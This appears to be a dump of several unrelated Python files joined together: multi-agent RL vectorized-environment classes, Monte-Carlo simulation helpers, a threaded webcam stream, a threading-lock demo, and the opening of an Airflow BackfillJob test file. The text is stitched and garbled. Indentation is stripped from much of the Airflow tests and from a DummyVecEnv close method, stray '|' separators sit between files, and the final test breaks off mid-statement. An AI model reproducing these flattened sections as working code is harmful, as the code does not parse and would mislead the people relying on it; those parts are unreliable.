    commands arriving over the pipe until 'close' is received.

    The command protocol mixes types: plain strings ('step', 'close',
    'get_spaces', ...), strings with an int suffix ('reset<N>',
    'init_set<N>') and lists (['new_starts_obs', agent_num, starts, [i]]).
    The ordering of the elif tests below is what disambiguates these forms.
    """
    parent_remote.close()
    env = env_fn_wrapper.x()
    while True:
        cmd, data = remote.recv()
        if cmd == 'step':
            # import time; start = time.time()
            ob, reward, done, info = env.step(data)
            # end = time.time()
            # if end-start > 0.7:
            # print('********')
            # print('one_step: ',end-start)
            # Auto-reset once every agent reports done.
            if all(done):
                ob = env.reset()
            remote.send((ob, reward, done, info))
        elif cmd[0] == 'new_starts_obs':
            # cmd is a list here: ['new_starts_obs', agent_num, starts, [i]].
            now_agent_num = cmd[1]
            starts = cmd[2]
            index_index = cmd[3]
            ob = env.new_starts_obs(starts,now_agent_num,index_index)
            remote.send(ob)
        elif cmd[0:5] == 'reset':
            # 'reset<N>': reset the env with N agents.
            now_agent_num = int(cmd[5:])
            ob = env.reset(now_agent_num)
            remote.send(ob)
        elif cmd[0:8] == "init_set":
            # 'init_set<N>': initialize a (presumably harder) start state.
            now_agent_num = int(cmd[8:])
            ob = env.init_set(now_agent_num)
            remote.send(ob)
        elif cmd == 'reset_task':
            ob = env.reset_task()
            remote.send(ob)
        elif cmd == 'close':
            remote.close()
            break
        elif cmd == 'get_spaces':
            remote.send((env.observation_space, env.action_space))
        elif cmd == 'get_agent_types':
            if all([hasattr(a, 'adversary') for a in env.agents]):
                remote.send(['adversary' if a.adversary else 'agent' for a in env.agents])
            else:
                remote.send(['agent' for _ in env.agents])
        else:
            raise NotImplementedError
class SubprocVecEnv(VecEnv):
    """
    Vectorized env that runs each sub-environment in its own subprocess,
    talking to the worker() loop over a Pipe.

    Several methods take now_num_processes, which restricts an operation to
    the first N remotes while the rest stay idle.
    """
    def __init__(self, env_fns, spaces=None):
        """
        envs: list of gym environments to run in subprocesses
        """
        self.waiting = False
        self.closed = False
        nenvs = len(env_fns)
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
            for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True # if the main process crashes, we should not cause things to hang
            p.start()
        # The worker keeps its own end; close the parent's copy of it.
        for remote in self.work_remotes:
            remote.close()
        # Query one worker for the shared spaces/agent types.
        self.remotes[0].send(('get_spaces', None))
        observation_space, action_space = self.remotes[0].recv()
        self.remotes[0].send(('get_agent_types', None))
        self.agent_types = self.remotes[0].recv()
        self.length = len(env_fns)
        VecEnv.__init__(self, self.length, observation_space, action_space)
    def step_async(self, actions, now_num_processes):
        # Dispatch actions to the first now_num_processes workers only.
        # import time;
        # start = time.time()
        i = 0
        for remote, action in zip(self.remotes, actions):
            # import pdb; pdb.set_trace()
            if i < now_num_processes:
                remote.send(('step', action))
            i += 1
        # end = time.time()
        # print('time_send: ',end-start)
        self.waiting = True
    def step_wait(self, now_num_processes):
        # Collect results from the same first now_num_processes workers.
        # import time; start = time.time()
        results = []
        i = 0
        for remote in self.remotes:
            if i < now_num_processes:
                results.append(remote.recv())
            i += 1
        # results = [remote.recv() for remote in self.remotes]
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        # end = time.time()
        # print('time_get: ',end-start)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos
    # def reset(self):
    #     for remote in self.remotes:
    #         remote.send(('reset', None))
    #     return np.stack([remote.recv() for remote in self.remotes])
    def new_starts_obs(self, starts, now_agent_num, now_num_processes):
        # Send a list-form command; each worker also gets its own index so it
        # can pick its slice of `starts`.
        tmp_list = ['new_starts_obs', now_agent_num, starts]
        i = 0
        results = []
        for remote in self.remotes:
            if i < now_num_processes:
                index_index = [i]
                remote.send((tmp_list + index_index, None))
            i += 1
        i = 0
        for remote in self.remotes:
            if i < now_num_processes:
                results.append(remote.recv())
            i += 1
        return np.stack(results)
    # using by main_reverse
    # def new_starts_obs(self, starts, now_agent_num):
    #     self.new_starts_obs_async(starts, sample_index, now_agent_num)
    #     return self.new_starts_obs_wait()
    # def new_starts_obs_async(self, starts, sample_index, now_agent_num):
    #     tmp_list = ['new_starts_obs', now_agent_num, starts, sample_index]
    #     i = 0
    #     for remote in self.remotes:
    #         index_index = [i]  # index into sample_index
    #         remote.send((tmp_list + index_index, None))
    #         i += 1
    #     self.waiting = True
    # def new_starts_obs_wait(self):
    #     results = [remote.recv() for remote in self.remotes]
    #     self.waiting = False
    #     obs, rou_index = zip(*results)
    #     return np.stack(obs), np.stack(rou_index)
    def init_set(self, now_agent_num, ratio):
        # First `ratio` fraction of envs get a hard init, the rest a normal
        # reset.
        hard_num = int(self.length * ratio)
        count = 0
        for remote in self.remotes:
            if count <= hard_num:
                remote.send(('init_set' + str(now_agent_num), None))
            else:
                remote.send(('reset' + str(now_agent_num), None))
            count = count + 1
        return np.stack([remote.recv() for remote in self.remotes])
    def reset(self, now_agent_num):
        for remote in self.remotes:
            remote.send(('reset' + str(now_agent_num), None))
        tmp = np.stack([remote.recv() for remote in self.remotes])
        # Agent count changed, so the spaces may have changed too:
        # re-query them and re-run the base initializer.
        self.remotes[0].send(('get_spaces', None))
        observation_space, action_space = self.remotes[0].recv()
        VecEnv.__init__(self, self.length, observation_space, action_space)
        return tmp
    def reset_task(self):
        for remote in self.remotes:
            remote.send(('reset_task', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def close(self):
        if self.closed:
            return
        # Drain any in-flight step results before asking workers to exit.
        if self.waiting:
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()
        self.closed = True
class DummyVecEnv(VecEnv):
    """
    In-process (no subprocess) counterpart of SubprocVecEnv: steps each env
    sequentially in the current process. Useful for debugging.
    """
    def __init__(self, env_fns):
        self.envs = [fn() for fn in env_fns]
        env = self.envs[0]
        self.length = len(env_fns)
        #import pdb; pdb.set_trace()
        VecEnv.__init__(self, self.length, env.observation_space, env.action_space)
        if all([hasattr(a, 'adversary') for a in env.agents]):
            self.agent_types = ['adversary' if a.adversary else 'agent' for a in
                env.agents]
        else:
            self.agent_types = ['agent' for _ in env.agents]
        # Per-env step counters, reset whenever an env auto-resets.
        self.ts = np.zeros(len(self.envs), dtype='int')
        self.actions = None
    def step_async(self, actions):
        # Nothing is actually asynchronous here; just stash the actions.
        self.actions = actions
    def step_wait(self):
        results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
        obs, rews, dones, infos = map(np.array, zip(*results))
        self.ts += 1
        # Auto-reset envs where every agent reports done.
        for (i, done) in enumerate(dones):
            if all(done):
                obs[i] = self.envs[i].reset()
                self.ts[i] = 0
        self.actions = None
        return np.array(obs), np.array(rews), np.array(dones), infos
    # def new_starts_obs(self, starts, now_agent_num):
    #     seed = 1
    #     obs,rou_index = env.new_starts_obs(starts,now_agent_num,seed)
    #     return np.array(obs)
    def init_set(self, now_agent_num):
        results = [env.init_set(now_agent_num) for env in self.envs]
        return np.array(results)
    # def reset(self):
    #     results = [env.reset() for env in self.envs]
    #     return np.array(results)
    def reset(self, now_agent_num):
        results = [env.reset(now_agent_num) for env in self.envs]
        env = self.envs[0]
        # Spaces may change with the agent count; re-run the base initializer.
        VecEnv.__init__(self, self.length, env.observation_space, env.action_space)
        # import pdb; pdb.set_trace()
        return np.array(results)
def close(self):
return |
monte_carlo_tools.py | ##############################################################################
# Some functions to make Monte-Carlo simulations smoother
# Authored by Ammar Mian, 29/10/2018
# e-mail: ammar.mian@centralesupelec.fr
##############################################################################
# Copyright 2018 @CentraleSupelec
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from multiprocessing import Process, Queue
import numpy as np
from LRST.generic_functions import *
import time
from tqdm import tqdm
def wrapper_multivariate_complex_normal_samples(data_args):
    """ Adapt multivariate_complex_normal_samples to the single-argument
        calling convention used by the Monte-Carlo driver.
        data_args = (mean, covariance, N, pseudo_covariance) """
    return multivariate_complex_normal_samples(*data_args)
def wrapper_multivariate_complex_t_samples(data_args):
    """ Adapt multivariate_complex_t_samples to the single-argument calling
        convention used by the Monte-Carlo driver.
        data_args = (mean, covariance, N, df, pseudo_covariance) """
    return multivariate_complex_t_samples(*data_args)
def wrapper_multivariate_complex_K_samples(data_args):
    """ Adapt multivariate_complex_K_samples to the single-argument calling
        convention used by the Monte-Carlo driver.
        data_args = (mean, covariance, N, mu, b, pseudo_covariance) """
    return multivariate_complex_K_samples(*data_args)
def wrapper_multivariate_complex_Cauchy_samples(data_args):
    """ Adapt multivariate_complex_Cauchy_samples to the single-argument
        calling convention used by the Monte-Carlo driver.
        data_args = (mean, covariance, N, mu, b, pseudo_covariance) """
    return multivariate_complex_Cauchy_samples(*data_args)
def wrapper_multivariate_complex_Laplace_samples(data_args):
    """ Adapt multivariate_complex_Laplace_samples to the single-argument
        calling convention used by the Monte-Carlo driver.
        data_args = (mean, covariance, N, beta, pseudo_covariance) """
    return multivariate_complex_Laplace_samples(*data_args)
def generate_time_series_multivariate_vector(Args):
    """ Generate a time series of random samples of dimension p: at each of T
        dates, N independent observations sharing that date's parameters.
        Inputs:
            * Args = (p, N, T, data_generation_function, data_args) where
                * p = dimension of samples
                * N = number of samples per date with identical parameters
                * T = length of the time series
                * data_generation_function = callable producing an array of
                  shape (p, N) from one element of data_args
                * data_args = per-date distribution parameters (length T)
        Outputs:
            * complex array of shape (p, N, T) holding the series """
    p, N, T, generation_function, data_args_list = Args
    series = np.zeros((p, N, T), dtype=complex)
    for date in range(T):
        series[..., date] = generation_function(data_args_list[date])
    return series
def compute_several_statistics(X, Args):
    """Evaluate several statistics on the same data and collect the results.

    Inputs:
        * X = the data
        * Args = (statistics_list, statistics_args) where statistics_args[i]
          is passed to statistics_list[i]
    Outputs:
        * list with the value of each statistic evaluated on X.
    """
    statistics_list, statistics_args = Args
    return [statistic(X, statistics_args[index])
            for index, statistic in enumerate(statistics_list)]
def compute_monte_carlo(data_generation_function, data_generation_args, function_to_compute,
                        function_args, number_of_trials, multi=False, queue=0, jobno=0):
    """Run Monte-Carlo trials: generate random data and evaluate a function of
    the observations at each trial.

    Inputs:
        * data_generation_function = callable generating the random data
        * data_generation_args = arguments passed to data_generation_function
        * function_to_compute = callable computing the desired quantity
        * function_args = arguments passed to function_to_compute
        * number_of_trials = number of Monte-Carlo trials to run
        * multi, queue, jobno = parallelization hooks: when multi is True the
          results are pushed to `queue` and jobno diversifies the RNG seed
    Outputs:
        * list of per-trial results (returned when multi is False,
          put on the queue otherwise).
    """
    if multi:
        # Derive a distinct seed per worker so jobs don't repeat each other.
        np.random.seed(int(time.time()) + jobno)
    results = [
        function_to_compute(data_generation_function(data_generation_args),
                            function_args)
        for _ in tqdm(np.arange(0, number_of_trials))
    ]
    if multi:
        queue.put(results)
    else:
        return results
def compute_monte_carlo_parallel(data_generation_function, data_generation_args, function_to_compute,
                                 function_args, number_of_trials, multi=False, number_of_threads=4):
    """ A function that is a parallelisation of compute_monte_carlo.
    Inputs:
        * data_generation_function = a function to generate the random data
        * data_generation_args = arguments to pass to data_generation_function
        * function_to_compute = a function to compute the desired quantity
        * function_args = arguments to pass to function_to_compute
        * number_of_trials = number of Monte-Carlo trials to run
          (make sure number_of_trials/number_of_threads is an integer,
          otherwise trials are silently truncated by the int() below)
        * multi = True if parallel computing, False if not
        * number_of_threads = number of worker processes to use
          (number of cores of the machine in general)
    Outputs:
        * a list containing the results at each trial """
    if multi:
        results = []  # Results container
        # One queue per worker process to collect its partial result list
        queues = [Queue() for i in range(number_of_threads)]
        # Each worker runs number_of_trials/number_of_threads trials; the
        # worker index i is passed as jobno to diversify the RNG seed.
        args = [(data_generation_function, data_generation_args, function_to_compute,
                 function_args, int(number_of_trials/number_of_threads),
                 True, queues[i], i) for i in range(number_of_threads)]
        jobs = [Process(target=compute_monte_carlo, args=a) for a in args]
        # Starting parallel computation
        for j in jobs: j.start()
        # Drain every queue BEFORE join(): per multiprocessing guidelines, a
        # child that still holds queued data cannot terminate, so joining
        # first could deadlock.
        for q in queues: results = results + q.get()
        # Waiting for each worker process to terminate
        for j in jobs: j.join()
    else:
        # Sequential fallback: a single direct call.
        results = compute_monte_carlo(data_generation_function, data_generation_args,
                                      function_to_compute, function_args, number_of_trials, multi=False)
    return results
|
webcamvideostream.py | # import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
    """Threaded wrapper around cv2.VideoCapture.

    A background thread continuously grabs frames so read() always returns the
    most recent frame without blocking on the camera.

    Fixes over the original:
      * the reader thread is now a daemon and is remembered, so the program can
        exit even if stop() is never called;
      * stop() joins the reader thread, so release() can no longer free the
        capture while update() is mid-read();
      * __del__ never raises (exceptions during interpreter teardown are
        suppressed).
    """

    def __init__(self, src=0, name="WebcamVideoStream"):
        # Open the video source and prime the first frame so read() is valid
        # immediately after construction.
        self.stream = cv2.VideoCapture(src)
        (self.grabbed, self.frame) = self.stream.read()
        # Thread name (useful when debugging multiple streams).
        self.name = name
        # Flag checked by the reader loop to know when to stop.
        self.stopped = False
        # Reader thread handle, set by start().
        self._thread = None

    def start(self):
        """Start the background frame-reader thread; returns self for chaining."""
        t = Thread(target=self.update, name=self.name, args=())
        t.daemon = True  # don't keep the interpreter alive on exit
        t.start()
        self._thread = t
        return self

    def update(self):
        """Reader loop: keep grabbing frames until stopped."""
        while True:
            if self.stopped:
                return
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        """Return the frame most recently read by the background thread."""
        return self.frame

    def stop(self):
        """Ask the reader thread to stop and wait briefly for it to finish."""
        self.stopped = True
        if self._thread is not None:
            # Join so no read() races a subsequent stream.release().
            self._thread.join(timeout=1.0)
            self._thread = None

    def release(self):
        """Stop recording and release the underlying capture device."""
        self.stop()
        self.stream.release()

    def __del__(self):
        # Best-effort cleanup when the object goes out of scope; never raise
        # from a finalizer (modules may already be torn down).
        try:
            self.release()
        except Exception:
            pass
|
threading_lock.py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
Inter-thread communication via shared state.

Demonstrates appending to a shared global list with and without a lock.
(Original docstring was mojibake-corrupted Chinese; rewritten in English.)
"""
import threading
from threading import Thread
# Create the lock shared by all worker threads
lock = threading.Lock()
# Shared list that every task appends to
l = []
def no_lock_append_task(i):
    """Append i to the shared global list ``l`` WITHOUT taking the lock.

    (Docstring translated from mojibake-corrupted Chinese.)
    """
    global l
    l.append(i)
    print("no lock l:", l)
def lock_append_task(i):
    """Append i to the shared global list ``l`` while holding the lock.

    Fix: ``Lock.acquire`` called with a timeout returns False when the lock
    was NOT obtained. The original ignored that result, so on timeout it would
    mutate ``l`` unprotected and then crash with RuntimeError on ``release()``
    of a lock it never held. The mutation is now guarded and the release sits
    in a ``finally`` so the lock cannot leak on error.
    """
    global l
    if not lock.acquire(blocking=True, timeout=2):
        # Timed out waiting for the lock: skip the unprotected mutation.
        return
    try:
        l.append(i)
        print("lock l:", l)
    finally:
        lock.release()
def lock_demo(use_lock=False):
    """Spawn ten threads that append to the shared list.

    use_lock selects the locked or unlocked task variant.
    """
    task = lock_append_task if use_lock else no_lock_append_task
    for index in range(10):
        worker = Thread(target=task, args=[index])
        worker.start()
def main():
    """Run the demo in its unlocked form.

    Pass use_lock=True to lock_demo to exercise the locked variant instead.
    """
    lock_demo()


if __name__ == '__main__':
    main()
|
test_jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
    """Tests for the BaseJob state machine: success, sys.exit and failure.

    Uses the deprecated-alias-free assertEqual (assertEquals is a deprecated
    unittest alias).
    """

    class TestJob(BaseJob):
        # Minimal concrete BaseJob whose _execute runs an injected callback.
        __mapper_args__ = {
            'polymorphic_identity': 'TestJob'
        }

        def __init__(self, cb):
            # Callback executed by _execute(); lets each test inject behavior.
            self.cb = cb
            super(BaseJobTest.TestJob, self).__init__()

        def _execute(self):
            return self.cb()

    def test_state_success(self):
        """A job whose callback returns normally ends in SUCCESS."""
        job = self.TestJob(lambda: True)
        job.run()
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_sysexit(self):
        """sys.exit(0) from the callback still counts as SUCCESS."""
        import sys
        job = self.TestJob(lambda: sys.exit(0))
        job.run()
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_failed(self):
        """An exception from the callback propagates and leaves state FAILED."""
        def abort():
            raise RuntimeError("fail")

        job = self.TestJob(abort)
        with self.assertRaises(RuntimeError):
            job.run()
        self.assertEqual(job.state, State.FAILED)
        self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
    """Integration tests for BackfillJob: dag runs, max-active limits,
    subdags, reruns and CLI interaction."""

    def setUp(self):
        # Fresh CLI parser and a dagbag including the example dags per test.
        self.parser = cli.CLIFactory.get_parser()
        self.dagbag = DagBag(include_examples=True)
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_trigger_controller_dag(self):
        """Backfilling the controller dag leaves schedulable task instances
        in the target dag."""
        dag = self.dagbag.get_dag('example_trigger_controller_dag')
        target_dag = self.dagbag.get_dag('example_trigger_target_dag')
        dag.clear()
        target_dag.clear()
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        # Before the backfill the target dag has nothing to schedule.
        self.assertFalse(queue.append.called)
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE,
            ignore_first_depends_on_past=True
        )
        job.run()
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        # After the backfill the controller has triggered the target dag, so
        # the scheduler now queues work for it.
        self.assertTrue(queue.append.called)
        target_dag.clear()
        dag.clear()
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_backfill_multi_dates(self):
        """Backfilling two consecutive days yields two SUCCESS dag runs,
        ordered by execution_date."""
        dag = self.dagbag.get_dag('example_bash_operator')
        dag.clear()
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE + datetime.timedelta(days=1),
            ignore_first_depends_on_past=True
        )
        job.run()
        session = settings.Session()
        drs = session.query(DagRun).filter(
            DagRun.dag_id == 'example_bash_operator'
        ).order_by(DagRun.execution_date).all()
        # First run is the start date, second is start date + 1 day.
        self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
        self.assertTrue(drs[0].state == State.SUCCESS)
        self.assertTrue(drs[1].execution_date ==
                        DEFAULT_DATE + datetime.timedelta(days=1))
        self.assertTrue(drs[1].state == State.SUCCESS)
        dag.clear()
        session.close()
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_backfill_examples(self):
        """
        Test backfilling example dags

        Try to backfill some of the example dags. Be careful, not all dags are suitable
        for doing this. For example, a dag that sleeps forever, or does not have a
        schedule won't work here since you simply can't backfill them.
        """
        # Whitelist of example dags known to be safely backfillable.
        include_dags = {
            'example_branch_operator',
            'example_bash_operator',
            'example_skip_dag',
            'latest_only'
        }
        dags = [
            dag for dag in self.dagbag.dags.values()
            if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
        ]
        for dag in dags:
            dag.clear(
                start_date=DEFAULT_DATE,
                end_date=DEFAULT_DATE)
        # Make sure that we have the dags that we want to test available
        # in the example_dags folder, if this assertion fails, one of the
        # dags in the include_dags array isn't available anymore
        self.assertEqual(len(include_dags), len(dags))
        # Sorted by dag_id for a deterministic execution order.
        for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
            logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
            job = BackfillJob(
                dag=dag,
                start_date=DEFAULT_DATE,
                end_date=DEFAULT_DATE,
                ignore_first_depends_on_past=True)
            job.run()
    def test_backfill_conf(self):
        """The conf dict passed to BackfillJob is stored on the created DagRun."""
        dag = DAG(
            dag_id='test_backfill_conf',
            start_date=DEFAULT_DATE,
            schedule_interval='@daily')
        with dag:
            DummyOperator(
                task_id='op',
                dag=dag)
        dag.clear()
        executor = TestExecutor(do_update=True)
        conf = json.loads("""{"key": "value"}""")
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          conf=conf)
        job.run()
        dr = DagRun.find(dag_id='test_backfill_conf')
        # The first found run should carry the conf verbatim.
        self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
    def test_backfill_rerun_failed_tasks_without_flag(self):
        """Without rerun_failed_tasks, backfilling over a FAILED ti raises
        AirflowException instead of silently re-running it."""
        dag = DAG(
            dag_id='test_backfill_rerun_failed',
            start_date=DEFAULT_DATE,
            schedule_interval='@daily')
        with dag:
            DummyOperator(
                task_id='test_backfill_rerun_failed_task-1',
                dag=dag)
        dag.clear()
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          )
        job.run()
        ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
                execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        # Force the ti into FAILED, then backfill WITHOUT the rerun flag.
        ti.set_state(State.FAILED)
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          rerun_failed_tasks=False
                          )
        with self.assertRaises(AirflowException):
            job.run()
    def test_backfill_ordered_concurrent_execute(self):
        """The executor receives tasks in dependency order across the three
        backfilled days (leaves first, then each upstream level)."""
        dag = DAG(
            dag_id='test_backfill_ordered_concurrent_execute',
            start_date=DEFAULT_DATE,
            schedule_interval="@daily")
        with dag:
            op1 = DummyOperator(task_id='leave1')
            op2 = DummyOperator(task_id='leave2')
            op3 = DummyOperator(task_id='upstream_level_1')
            op4 = DummyOperator(task_id='upstream_level_2')
            op5 = DummyOperator(task_id='upstream_level_3')
            # order randomly
            op2.set_downstream(op3)
            op1.set_downstream(op3)
            op4.set_downstream(op5)
            op3.set_downstream(op4)
        dag.clear()
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          )
        job.run()
        # test executor history keeps a list
        history = executor.history
        # check if right order. Every loop has a 'pause' (0) to change state
        # from RUNNING to SUCCESS.
        # 6,0,3,0,3,0,3,0 = 8 loops
        self.assertEqual(8, len(history))
        loop_count = 0
        while len(history) > 0:
            queued_tasks = history.pop(0)
            if loop_count == 0:
                # first loop should contain 6 tasks (3 days x 2 tasks)
                self.assertEqual(6, len(queued_tasks))
            if loop_count == 2 or loop_count == 4 or loop_count == 6:
                # 3 days x 1 task
                self.assertEqual(3, len(queued_tasks))
            loop_count += 1
    def test_backfill_pooled_tasks(self):
        """
        Test that queued tasks are executed by BackfillJob
        """
        session = settings.Session()
        # A pool with a single slot forces tasks to queue behind each other.
        pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
        session.add(pool)
        session.commit()
        dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
        dag.clear()
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE)
        # run with timeout because this creates an infinite loop if not
        # caught
        with timeout(seconds=30):
            job.run()
        ti = TI(
            task=dag.get_task('test_backfill_pooled_task'),
            execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
